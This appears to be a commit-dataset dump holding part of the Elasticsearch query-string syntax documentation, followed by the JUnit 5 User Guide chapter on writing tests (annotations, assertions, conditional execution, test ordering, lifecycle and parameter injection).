_exists_:title\n\n===== Wildcards\n\nWildcard searches can be run on individual terms, using `?` to replace\na single character, and `*` to replace zero or more characters:\n\n qu?ck bro*\n\nBe aware that wildcard queries can use an enormous amount of memory and\nperform very badly -- just think how many terms need to be queried to\nmatch the query string `\"a* b* c*\"`.\n\n[WARNING]\n======\nAllowing a wildcard at the beginning of a word (eg `\"*ing\"`) is particularly\nheavy, because all terms in the index need to be examined, just in case\nthey match. Leading wildcards can be disabled by setting\n`allow_leading_wildcard` to `false`.\n======\n\nWildcarded terms are not analyzed by default -- they are lowercased\n(`lowercase_expanded_terms` defaults to `true`) but no further analysis\nis done, mainly because it is impossible to accurately analyze a word that\nis missing some of its letters. However, by setting `analyze_wildcard` to\n`true`, an attempt will be made to analyze wildcarded words before searching\nthe term list for matching terms.\n\n===== Regular expressions\n\nRegular expression patterns can be embedded in the query string by\nwrapping them in forward-slashes (`\"\/\"`):\n\n name:\/joh?n(ath[oa]n)\/\n\nThe supported regular expression syntax is explained in <<regexp-syntax>>.\n\n[WARNING]\n======\nThe `allow_leading_wildcard` parameter does not have any control over\nregular expressions. 
A query string such as the following would force\nElasticsearch to visit every term in the index:\n\n \/.*n\/\n\nUse with caution!\n======\n\n===== Fuzziness\n\nWe can search for terms that are\nsimilar to, but not exactly like our search terms, using the ``fuzzy''\noperator:\n\n quikc~ brwn~ foks~\n\nThis uses the\nhttp:\/\/en.wikipedia.org\/wiki\/Damerau-Levenshtein_distance[Damerau-Levenshtein distance]\nto find all terms with a maximum of\ntwo changes, where a change is the insertion, deletion\nor substitution of a single character, or transposition of two adjacent\ncharacters.\n\nThe default _edit distance_ is `2`, but an edit distance of `1` should be\nsufficient to catch 80% of all human misspellings. It can be specified as:\n\n quikc~1\n\n===== Proximity searches\n\nWhile a phrase query (eg `\"john smith\"`) expects all of the terms in exactly\nthe same order, a proximity query allows the specified words to be further\napart or in a different order. In the same way that fuzzy queries can\nspecify a maximum edit distance for characters in a word, a proximity search\nallows us to specify a maximum edit distance of words in a phrase:\n\n \"fox quick\"~5\n\nThe closer the text in a field is to the original order specified in the\nquery string, the more relevant that document is considered to be. When\ncompared to the above example query, the phrase `\"quick fox\"` would be\nconsidered more relevant than `\"quick brown fox\"`.\n\n===== Ranges\n\nRanges can be specified for date, numeric or string fields. Inclusive ranges\nare specified with square brackets `[min TO max]` and exclusive ranges with\ncurly brackets `{min TO max}`.\n\n* All days in 2012:\n\n date:[2012\/01\/01 TO 2012\/12\/31]\n\n* Numbers 1..5\n\n count:[1 TO 5]\n\n* Tags between `alpha` and `omega`, excluding `alpha` and `omega`:\n\n tag:{alpha TO omega}\n\n* Numbers from 10 upwards\n\n count:[10 TO *]\n\n* Dates before 2012\n\n date:{* TO 2012\/01\/01}\n\nCurly and square brackets can be combined:\n\n* Numbers from 1 up to but not including 5\n\n count:[1..5}\n\n\nRanges with one side unbounded can use the following syntax:\n\n age:>10\n age:>=10\n age:<10\n age:<=10\n\n[NOTE]\n===================================================================\nTo combine an upper and lower bound with the simplified syntax, you\nwould need to join two clauses with an `AND` operator:\n\n age:(>=10 AND < 20)\n age:(+>=10 +<20)\n\n===================================================================\n\nThe parsing of ranges in query strings can be complex and error prone. It is\nmuch more reliable to use an explicit <<query-dsl-range-filter,`range` filter>>.\n\n\n===== Boosting\n\nUse the _boost_ operator `^` to make one term more relevant than another.\nFor instance, if we want to find all documents about foxes, but we are\nespecially interested in quick foxes:\n\n quick^2 fox\n\nThe default `boost` value is 1, but can be any positive floating point number.\nBoosts between 0 and 1 reduce relevance.\n\nBoosts can also be applied to phrases or to groups:\n\n \"john smith\"^2 (foo bar)^4\n\n===== Boolean operators\n\nBy default, all terms are optional, as long as one term matches. A search\nfor `foo bar baz` will find any document that contains one or more of\n`foo` or `bar` or `baz`. 
We have already discussed the `default_operator`\nabove which allows you to force all terms to be required, but there are\nalso _boolean operators_ which can be used in the query string itself\nto provide more control.\n\nThe preferred operators are `+` (this term *must* be present) and `-`\n(this term *must not* be present). All other terms are optional.\nFor example, this query:\n\n quick brown +fox -news\n\nstates that:\n\n* `fox` must be present\n* `news` must not be present\n* `quick` and `brown` are optional -- their presence increases the relevance\n\nThe familiar operators `AND`, `OR` and `NOT` (also written `&&`, `||` and `!`)\nare also supported. However, the effects of these operators can be more\ncomplicated than is obvious at first glance. `NOT` takes precedence over\n`AND`, which takes precedence over `OR`. While the `+` and `-` only affect\nthe term to the right of the operator, `AND` and `OR` can affect the terms to\nthe left and right.\n\n****\nRewriting the above query using `AND`, `OR` and `NOT` demonstrates the\ncomplexity:\n\n`quick OR brown AND fox AND NOT news`::\n\nThis is incorrect, because `brown` is now a required term.\n\n`(quick OR brown) AND fox AND NOT news`::\n\nThis is incorrect because at least one of `quick` or `brown` is now required\nand the search for those terms would be scored differently from the original\nquery.\n\n`((quick AND fox) OR (brown AND fox) OR fox) AND NOT news`::\n\nThis form now replicates the logic from the original query correctly, but\nthe relevance scoring bares little resemblance to the original.\n\nIn contrast, the same query rewritten using the <<query-dsl-match-query,`match` query>>\nwould look like this:\n\n {\n \"bool\": {\n \"must\": { \"match\": \"fox\" },\n \"should\": { \"match\": \"quick brown\" },\n \"must_not\": { \"match\": \"news\" }\n }\n }\n\n****\n\n===== Grouping\n\nMultiple terms or clauses can be grouped together with parentheses, to form\nsub-queries:\n\n (quick OR brown) AND fox\n\nGroups can be used to target a particular field, or to boost the result\nof a sub-query:\n\n status:(active OR pending) title:(full text search)^2\n\n===== Reserved characters\n\nIf you need to use any of the characters which function as operators in your\nquery itself (and not as operators), then you should escape them with\na leading backslash. For instance, to search for `(1+1)=2`, you would\nneed to write your query as `\\(1\\+1\\)=2`.\n\nThe reserved characters are: `+ - && || ! ( ) { } [ ] ^ \" ~ * ? : \\ \/`\n\nFailing to escape these special characters correctly could lead to a syntax\nerror which prevents your query from running.\n\n.Watch this space\n****\nA space may also be a reserved character. For instance, if you have a\nsynonym list which converts `\"wi fi\"` to `\"wifi\"`, a `query_string` search\nfor `\"wi fi\"` would fail. The query string parser would interpret your\nquery as a search for `\"wi OR fi\"`, while the token stored in your\nindex is actually `\"wifi\"`. Escaping the space will protect it from\nbeing touched by the query string parser: `\"wi\\ fi\"`.\n****\n\n===== Empty Query\n\nIf the query string is empty or only contains whitespaces the\nquery string is interpreted as a `no_docs_query` and will yield\nan empty result set. 
\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ed7a4d4421ea8d9610ff469a08517975ca160cc","subject":"Add cross-references to Annotations section of User Guide","message":"Add cross-references to Annotations section of User Guide\n\nThis commit also adds an entry for @RegisterExtension to the table.\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/writing-tests.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/writing-tests.adoc","new_contents":"[[writing-tests]]\n== Writing Tests\n\n[source,java,indent=0]\n.A first test case\n----\ninclude::{testDir}\/example\/MyFirstJUnitJupiterTests.java[tags=user_guide]\n----\n\n[[writing-tests-annotations]]\n=== Annotations\n\nJUnit Jupiter supports the following annotations for configuring tests and extending the\nframework.\n\nAll core annotations are located in the `{api-package}` package in the `junit-jupiter-api`\nmodule.\n\n[cols=\"20,80\"]\n|===\n| Annotation | Description\n\n| `@Test` | Denotes that a method is a test method. Unlike JUnit 4's `@Test` annotation, this annotation does not declare any attributes, since test extensions in JUnit Jupiter operate based on their own dedicated annotations. Such methods are _inherited_ unless they are _overridden_.\n| `@ParameterizedTest` | Denotes that a method is a <<writing-tests-parameterized-tests, parameterized test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@RepeatedTest` | Denotes that a method is a test template for a <<writing-tests-repeated-tests, repeated test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestFactory` | Denotes that a method is a test factory for <<writing-tests-dynamic-tests, dynamic tests>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestTemplate` | Denotes that a method is a <<writing-tests-test-templates, template for test cases>> designed to be invoked multiple times depending on the number of invocation contexts returned by the registered <<extensions-test-templates, providers>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestMethodOrder` | Used to configure the <<writing-tests-test-execution-order, test method execution order>> for the annotated test class; similar to JUnit 4's `@FixMethodOrder`. Such annotations are _inherited_.\n| `@TestInstance` | Used to configure the <<writing-tests-test-instance-lifecycle, test instance lifecycle>> for the annotated test class. Such annotations are _inherited_.\n| `@DisplayName` | Declares a custom <<writing-tests-display-names,display name>> for the test class or test method. Such annotations are not _inherited_.\n| `@DisplayNameGeneration` | Declares a custom <<writing-tests-display-name-generator,display name generator>> for the test class. Such annotations are _inherited_.\n| `@BeforeEach` | Denotes that the annotated method should be executed _before_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@Before`. Such methods are _inherited_ unless they are _overridden_.\n| `@AfterEach` | Denotes that the annotated method should be executed _after_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@After`. 
Such methods are _inherited_ unless they are _overridden_.\n| `@BeforeAll` | Denotes that the annotated method should be executed _before_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@BeforeClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@AfterAll` | Denotes that the annotated method should be executed _after_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@AfterClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@Nested` | Denotes that the annotated class is a non-static <<writing-tests-nested,nested test class>>. `@BeforeAll` and `@AfterAll` methods cannot be used directly in a `@Nested` test class unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used. Such annotations are not _inherited_.\n| `@Tag` | Used to declare <<writing-tests-tagging-and-filtering,tags for filtering tests>>, either at the class or method level; analogous to test groups in TestNG or Categories in JUnit 4. Such annotations are _inherited_ at the class level but not at the method level.\n| `@Disabled` | Used to <<writing-tests-disabling,disable>> a test class or test method; analogous to JUnit 4's `@Ignore`. Such annotations are not _inherited_.\n| `@ExtendWith` | Used to <<extensions-registration-declarative,register extensions declaratively>>. Such annotations are _inherited_.\n| `@RegisterExtension` | Used to <<extensions-registration-programmatic,register extensions programmatically>> via fields. Such fields are _inherited_ unless they are _shadowed_.\n|===\n\nAny method annotated with `@Test`, `@TestTemplate`, `@RepeatedTest`, `@ParameterizedTest`,\n`@BeforeAll`, `@AfterAll`, `@BeforeEach`, or `@AfterEach` must not return a value.\n\nWARNING: Some annotations may currently be _experimental_. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-meta-annotations]]\n==== Meta-Annotations and Composed Annotations\n\nJUnit Jupiter annotations can be used as _meta-annotations_. That means that you can\ndefine your own _composed annotation_ that will automatically _inherit_ the semantics of\nits meta-annotations.\n\nFor example, instead of copying and pasting `@Tag(\"fast\")` throughout your code base (see\n<<writing-tests-tagging-and-filtering>>), you can create a custom _composed annotation_\nnamed `@Fast` as follows. `@Fast` can then be used as a drop-in replacement for\n`@Tag(\"fast\")`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/Fast.java[tags=user_guide]\n----\n\n[[writing-tests-classes-and-methods]]\n=== Test Classes and Methods\n\nA _test method_ is any instance method that is directly annotated or meta-annotated with\n`@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or `@TestTemplate`. 
A\n_test class_ is any top-level or `static` member class that contains at least one _test\nmethod_.\n\n[source,java,indent=0]\n.A standard test class\n----\ninclude::{testDir}\/example\/StandardTests.java[tags=user_guide]\n----\n\nNOTE: Test classes and test methods are not required to be `public`, but they must _not_\nbe `private`.\n\n[[writing-tests-display-names]]\n=== Display Names\n\nTest classes and test methods can declare custom display names -- with spaces, special\ncharacters, and even emojis -- that will be displayed by test runners and test reporting.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameDemo.java[tags=user_guide]\n----\n\n[[writing-tests-display-name-generator]]\n==== Display Name Generators\n\nJUnit Jupiter supports custom display name generators that can be configured via the\n`@DisplayNameGeneration` annotation. Values provided via `@DisplayName` annotations\nalways take precedence over display names generated by a `DisplayNameGenerator`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameGeneratorDemo.java[tags=user_guide]\n----\n\n```\n+-- DisplayNameGeneratorDemo [OK]\n +-- A year is not supported [OK]\n | +-- A negative value for year is not supported by the leap year computation. [OK]\n | | +-- For example, year -1 is not supported. [OK]\n | | '-- For example, year -4 is not supported. [OK]\n | '-- if it is zero() [OK]\n '-- A year is a leap year... [OK]\n +-- A year is a leap year if it is divisible by 4 but not by 100. [OK]\n '-- A year is a leap year if it is one of the following years. [OK]\n +-- Year 2016 is a leap year. [OK]\n +-- Year 2020 is a leap year. [OK]\n '-- Year 2048 is a leap year. [OK]\n```\n\n[[writing-tests-assertions]]\n=== Assertions\n\nJUnit Jupiter comes with many of the assertion methods that JUnit 4 has and adds a few\nthat lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assertions\nare `static` methods in the `{Assertions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssertionsDemo.java[tags=user_guide]\n----\n\nJUnit Jupiter also comes with a few assertion methods that lend themselves well to being\nused in https:\/\/kotlinlang.org\/[Kotlin]. All JUnit Jupiter Kotlin assertions are top-level\nfunctions in the `org.junit.jupiter.api` package.\n\n\/\/ TODO: Change to using kotlin language highlighting after switch to rouge syntax highlighter\n[source,groovy,indent=0]\n----\ninclude::{kotlinTestDir}\/example\/AssertionsKotlinDemo.kt[tags=user_guide]\n----\n\n[[writing-tests-assertions-third-party]]\n==== Third-party Assertion Libraries\n\nEven though the assertion facilities provided by JUnit Jupiter are sufficient for many\ntesting scenarios, there are times when more power and additional functionality such as\n_matchers_ are desired or required. In such cases, the JUnit team recommends the use of\nthird-party assertion libraries such as {AssertJ}, {Hamcrest}, {Truth}, etc. Developers\nare therefore free to use the assertion library of their choice.\n\nFor example, the combination of _matchers_ and a fluent API can be used to make\nassertions more descriptive and readable. However, JUnit Jupiter's `{Assertions}` class\ndoes not provide an\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/junit\/Assert.html#assertThat[`assertThat()`]\nmethod like the one found in JUnit 4's `org.junit.Assert` class which accepts a Hamcrest\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/hamcrest\/Matcher.html[`Matcher`]. 
Instead,\ndevelopers are encouraged to use the built-in support for matchers provided by third-party\nassertion libraries.\n\nThe following example demonstrates how to use the `assertThat()` support from Hamcrest in\na JUnit Jupiter test. As long as the Hamcrest library has been added to the classpath,\nyou can statically import methods such as `assertThat()`, `is()`, and `equalTo()` and\nthen use them in tests like in the `assertWithHamcrestMatcher()` method below.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/HamcrestAssertionDemo.java[tags=user_guide]\n----\n\nNaturally, legacy tests based on the JUnit 4 programming model can continue using\n`org.junit.Assert#assertThat`.\n\n[[writing-tests-assumptions]]\n=== Assumptions\n\nJUnit Jupiter comes with a subset of the assumption methods that JUnit 4 provides and\nadds a few that lend themselves well to being used with Java 8 lambda expressions and\nmethod references. All JUnit Jupiter assumptions are static methods in the\n`{Assumptions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssumptionsDemo.java[tags=user_guide]\n----\n\nNOTE: As of JUnit Jupiter 5.4, it is also possible to use methods from JUnit 4's\n`org.junit.Assume` class for assumptions. Specifically, JUnit Jupiter supports JUnit 4's\n`AssumptionViolatedException` to signal that a test should be aborted instead of marked\nas a failure.\n\n[[writing-tests-disabling]]\n=== Disabling Tests\n\nEntire test classes or individual test methods may be _disabled_ via the `{Disabled}`\nannotation, via one of the annotations discussed in\n<<writing-tests-conditional-execution>>, or via a custom <<extensions-conditions,\n`ExecutionCondition`>>.\n\nHere's a `@Disabled` test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledClassDemo.java[tags=user_guide]\n----\n\nAnd here's a test class that contains a `@Disabled` test method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledTestsDemo.java[tags=user_guide]\n----\n\nNOTE: `@Disabled` may be declared without providing a _reason_; however, the JUnit team\nrecommends that developers provide a short explanation for why a test class or test\nmethod has been disabled. Consequently, the above examples both show the use of a reason\n-- for example, `@Disabled(\"Disabled until bug #42 has been resolved\")`. Some development\nteams even require the presence of issue tracking numbers in the _reason_ for automated\ntraceability, etc.\n\n[[writing-tests-conditional-execution]]\n=== Conditional Test Execution\n\nThe <<extensions-conditions, `ExecutionCondition`>> extension API in JUnit Jupiter allows\ndevelopers to either _enable_ or _disable_ a container or test based on certain\nconditions _programmatically_. The simplest example of such a condition is the built-in\n`{DisabledCondition}` which supports the `{Disabled}` annotation (see\n<<writing-tests-disabling>>). In addition to `@Disabled`, JUnit Jupiter also supports\nseveral other annotation-based conditions in the `org.junit.jupiter.api.condition`\npackage that allow developers to enable or disable containers and tests _declaratively_.\nSee the following sections for details.\n\n[TIP]\n.Composed Annotations\n====\nNote that any of the _conditional_ annotations listed in the following sections may also\nbe used as a meta-annotation in order to create a custom _composed annotation_. 
For\nexample, the `@TestOnMac` annotation in the\n<<writing-tests-conditional-execution-os-demo, @EnabledOnOs demo>> shows how you can\ncombine `@Test` and `@EnabledOnOs` in a single, reusable annotation.\n====\n\n[WARNING]\n====\nEach of the _conditional_ annotations listed in the following sections can only be\ndeclared once on a given test interface, test class, or test method. If a conditional\nannotation is directly present, indirectly present, or meta-present multiple times on a\ngiven element, only the first such annotation discovered by JUnit will be used; any\nadditional declarations will be silently ignored. Note, however, that each conditional\nannotation may be used in conjunction with other conditional annotations in the\n`org.junit.jupiter.api.condition` package.\n====\n\n[[writing-tests-conditional-execution-os]]\n==== Operating System Conditions\n\nA container or test may be enabled or disabled on a particular operating system via the\n`{EnabledOnOs}` and `{DisabledOnOs}` annotations.\n\n[[writing-tests-conditional-execution-os-demo]]\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_os]\n----\n\n[[writing-tests-conditional-execution-jre]]\n==== Java Runtime Environment Conditions\n\nA container or test may be enabled or disabled on a particular version of the Java\nRuntime Environment (JRE) via the `{EnabledOnJre}` and `{DisabledOnJre}` annotations.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_jre]\n----\n\n[[writing-tests-conditional-execution-system-properties]]\n==== System Property Conditions\n\nA container or test may be enabled or disabled based on the value of the `named` JVM\nsystem property via the `{EnabledIfSystemProperty}` and `{DisabledIfSystemProperty}`\nannotations. The value supplied via the `matches` attribute will be interpreted as a\nregular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_system_property]\n----\n\n[[writing-tests-conditional-execution-environment-variables]]\n==== Environment Variable Conditions\n\nA container or test may be enabled or disabled based on the value of the `named`\nenvironment variable from the underlying operating system via the\n`{EnabledIfEnvironmentVariable}` and `{DisabledIfEnvironmentVariable}` annotations. The\nvalue supplied via the `matches` attribute will be interpreted as a regular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_environment_variable]\n----\n\n[[writing-tests-conditional-execution-scripts]]\n==== Script-based Conditions\n\nJUnit Jupiter provides the ability to either _enable_ or _disable_ a container or test\ndepending on the evaluation of a script configured via the `{EnabledIf}` or\n`{DisabledIf}` annotation. Scripts can be written in JavaScript, Groovy, or any other\nscripting language for which there is support for the Java Scripting API, defined by JSR\n223.\n\nWARNING: Conditional test execution via `{EnabledIf}` and `{DisabledIf}` is currently an\n_experimental_ feature. 
Consult the table in <<api-evolution-experimental-apis>> for\ndetails.\n\nTIP: If the logic of your script depends only on the current operating system, the\ncurrent Java Runtime Environment version, a particular JVM system property, or a\nparticular environment variable, you should consider using one of the built-in\nannotations dedicated to that purpose. See the previous sections of this chapter for\nfurther details.\n\nNOTE: If you find yourself using the same script-based condition many times, consider\nwriting a dedicated <<extensions-conditions, ExecutionCondition>> extension in order to\nimplement the condition in a faster, type-safe, and more maintainable manner.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_scripts]\n----\n\n[[writing-tests-conditional-execution-scripts-bindings]]\n===== Script Bindings\n\nThe following names are bound to each script context and therefore usable within the\nscript. An _accessor_ provides access to a map-like structure via a simple `String\nget(String name)` method.\n\n[cols=\"25,25,75\"]\n|===\n| Name | Type | Description\n\n| `systemEnvironment` | _accessor_ | Operating system environment variable accessor.\n| `systemProperty` | _accessor_ | JVM system property accessor.\n| `junitConfigurationParameter` | _accessor_ | Configuration parameter accessor.\n| `junitDisplayName` | `String` | Display name of the test or container.\n| `junitTags` | `Set<String>` | All tags assigned to the test or container.\n| `junitUniqueId` | `String` | Unique ID of the test or container.\n|===\n\n\n[[writing-tests-tagging-and-filtering]]\n=== Tagging and Filtering\n\nTest classes and methods can be tagged via the `@Tag` annotation. Those tags can later be\nused to filter <<running-tests,test discovery and execution>>.\n\n==== Syntax Rules for Tags\n\n* A tag must not be `null` or _blank_.\n* A _trimmed_ tag must not contain whitespace.\n* A _trimmed_ tag must not contain ISO control characters.\n* A _trimmed_ tag must not contain any of the following _reserved characters_.\n - `,`: _comma_\n - `(`: _left parenthesis_\n - `)`: _right parenthesis_\n - `&`: _ampersand_\n - `|`: _vertical bar_\n - `!`: _exclamation point_\n\nNOTE: In the above context, \"trimmed\" means that leading and trailing whitespace\ncharacters have been removed.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TaggingDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-execution-order]]\n=== Test Execution Order\n\nBy default, test methods will be ordered using a default algorithm that is deterministic\nbut intentionally nonobvious. This ensures that subsequent runs of a test suite execute\ntest methods in the same order, thereby allowing for repeatable builds.\n\nNOTE: In this context, a _test method_ is any instance method that is directly or\nmeta-annotated with `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or\n`@TestTemplate`.\n\nAlthough true _unit tests_ typically should not rely on the order in which they are\nexecuted, there are times when it is necessary to enforce a specific test method\nexecution order -- for example, when writing _integration tests_ or _functional tests_\nwhere the sequence of the tests is important, especially in conjunction with\n`@TestInstance(Lifecycle.PER_CLASS)`.\n\nTo control the order in which test methods are executed, annotate your test class or test\ninterface with `{TestMethodOrder}` and specify the desired `{MethodOrderer}`\nimplementation. 
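\n\nFor example, to run test methods alphanumerically you could write the following (a minimal sketch using the built-in `Alphanumeric` orderer described below; the class and method names are illustrative):\n\n[source,java]\n----\nimport org.junit.jupiter.api.MethodOrderer;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.TestMethodOrder;\n\n\/\/ Sketch: testA() runs before testB(), regardless of declaration order.\n@TestMethodOrder(MethodOrderer.Alphanumeric.class)\nclass AlphanumericOrderSketchTests {\n\n\t@Test\n\tvoid testB() {\n\t}\n\n\t@Test\n\tvoid testA() {\n\t}\n}\n----\n\n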
You can implement your own custom `MethodOrderer` or use one of the\nfollowing built-in `MethodOrderer` implementations.\n\n* `{Alphanumeric}`: sorts test methods _alphanumerically_ based on their names and formal\n parameter lists.\n* `{OrderAnnotation}`: sorts test methods _numerically_ based on values specified via the\n `{Order}` annotation.\n* `{Random}`: orders test methods _pseudo-randomly_ and supports configuration of a\n custom _seed_.\n\nThe following example demonstrates how to guarantee that test methods are executed in the\norder specified via the `@Order` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/OrderedTestsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-instance-lifecycle]]\n=== Test Instance Lifecycle\n\nIn order to allow individual test methods to be executed in isolation and to avoid\nunexpected side effects due to mutable test instance state, JUnit creates a new instance\nof each test class before executing each _test method_ (see\n<<writing-tests-classes-and-methods>>). This \"per-method\" test instance lifecycle is the\ndefault behavior in JUnit Jupiter and is analogous to all previous versions of JUnit.\n\nNOTE: Please note that the test class will still be instantiated if a given _test method_\nis _disabled_ via a <<writing-tests-conditional-execution,condition>> (e.g., `@Disabled`,\n`@DisabledOnOs`, etc.) even when the \"per-method\" test instance lifecycle mode is active.\n\nIf you would prefer that JUnit Jupiter execute all test methods on the same test\ninstance, annotate your test class with `@TestInstance(Lifecycle.PER_CLASS)`. When using\nthis mode, a new test instance will be created once per test class. Thus, if your test\nmethods rely on state stored in instance variables, you may need to reset that state in\n`@BeforeEach` or `@AfterEach` methods.\n\nThe \"per-class\" mode has some additional benefits over the default \"per-method\" mode.\nSpecifically, with the \"per-class\" mode it becomes possible to declare `@BeforeAll` and\n`@AfterAll` on non-static methods as well as on interface `default` methods. The\n\"per-class\" mode therefore also makes it possible to use `@BeforeAll` and `@AfterAll`\nmethods in `@Nested` test classes.\n\nIf you are authoring tests using the Kotlin programming language, you may also find it\neasier to implement `@BeforeAll` and `@AfterAll` methods by switching to the \"per-class\"\ntest instance lifecycle mode.\n\n[[writing-tests-test-instance-lifecycle-changing-default]]\n==== Changing the Default Test Instance Lifecycle\n\nIf a test class or test interface is not annotated with `@TestInstance`, JUnit Jupiter\nwill use a _default_ lifecycle mode. The standard _default_ mode is `PER_METHOD`;\nhowever, it is possible to change the _default_ for the execution of an entire test plan.\nTo change the default test instance lifecycle mode, set the\n`junit.jupiter.testinstance.lifecycle.default` _configuration parameter_ to the name of\nan enum constant defined in `TestInstance.Lifecycle`, ignoring case. 
This can be supplied\nas a JVM system property, as a _configuration parameter_ in the\n`LauncherDiscoveryRequest` that is passed to the `Launcher`, or via the JUnit Platform\nconfiguration file (see <<running-tests-config-params>> for details).\n\nFor example, to set the default test instance lifecycle mode to `Lifecycle.PER_CLASS`,\nyou can start your JVM with the following system property.\n\n`-Djunit.jupiter.testinstance.lifecycle.default=per_class`\n\nNote, however, that setting the default test instance lifecycle mode via the JUnit\nPlatform configuration file is a more robust solution since the configuration file can be\nchecked into a version control system along with your project and can therefore be used\nwithin IDEs and your build software.\n\nTo set the default test instance lifecycle mode to `Lifecycle.PER_CLASS` via the JUnit\nPlatform configuration file, create a file named `junit-platform.properties` in the root\nof the class path (e.g., `src\/test\/resources`) with the following content.\n\n`junit.jupiter.testinstance.lifecycle.default = per_class`\n\nWARNING: Changing the _default_ test instance lifecycle mode can lead to unpredictable\nresults and fragile builds if not applied consistently. For example, if the build\nconfigures \"per-class\" semantics as the default but tests in the IDE are executed using\n\"per-method\" semantics, that can make it difficult to debug errors that occur on the\nbuild server. It is therefore recommended to change the default in the JUnit Platform\nconfiguration file instead of via a JVM system property.\n\n[[writing-tests-nested]]\n=== Nested Tests\n\nNested tests give the test writer more capabilities to express the relationship among\nseveral groups of tests. Here's an elaborate example.\n\n[source,java,indent=0]\n.Nested test suite for testing a stack\n----\ninclude::{testDir}\/example\/TestingAStackDemo.java[tags=user_guide]\n----\n\nNOTE: _Only non-static nested classes_ (i.e. _inner classes_) can serve as `@Nested` test\nclasses. Nesting can be arbitrarily deep, and those inner classes are considered to be\nfull members of the test class family with one exception: `@BeforeAll` and `@AfterAll`\nmethods do not work _by default_. The reason is that Java does not allow `static` members\nin inner classes. However, this restriction can be circumvented by annotating a `@Nested`\ntest class with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>).\n\n[[writing-tests-dependency-injection]]\n=== Dependency Injection for Constructors and Methods\n\nIn all prior JUnit versions, test constructors or methods were not allowed to have\nparameters (at least not with the standard `Runner` implementations). As one of the major\nchanges in JUnit Jupiter, both test constructors and methods are now permitted to have\nparameters. This allows for greater flexibility and enables _Dependency Injection_ for\nconstructors and methods.\n\n`{ParameterResolver}` defines the API for test extensions that wish to _dynamically_\nresolve parameters at runtime. 
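\n\nTo give a feel for the API, here is a minimal sketch of a custom resolver (illustrative, not one of the built-in resolvers) that supplies a fixed `String` for any `String` parameter; it would be registered like any other extension, for example via `@ExtendWith(GreetingParameterResolver.class)`:\n\n[source,java]\n----\nimport org.junit.jupiter.api.extension.ExtensionContext;\nimport org.junit.jupiter.api.extension.ParameterContext;\nimport org.junit.jupiter.api.extension.ParameterResolver;\n\n\/\/ Sketch: resolves every String parameter to a fixed greeting.\npublic class GreetingParameterResolver implements ParameterResolver {\n\n\t@Override\n\tpublic boolean supportsParameter(ParameterContext parameterContext, ExtensionContext extensionContext) {\n\t\treturn parameterContext.getParameter().getType() == String.class;\n\t}\n\n\t@Override\n\tpublic Object resolveParameter(ParameterContext parameterContext, ExtensionContext extensionContext) {\n\t\treturn \"Hello, JUnit!\";\n\t}\n}\n----\n\n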
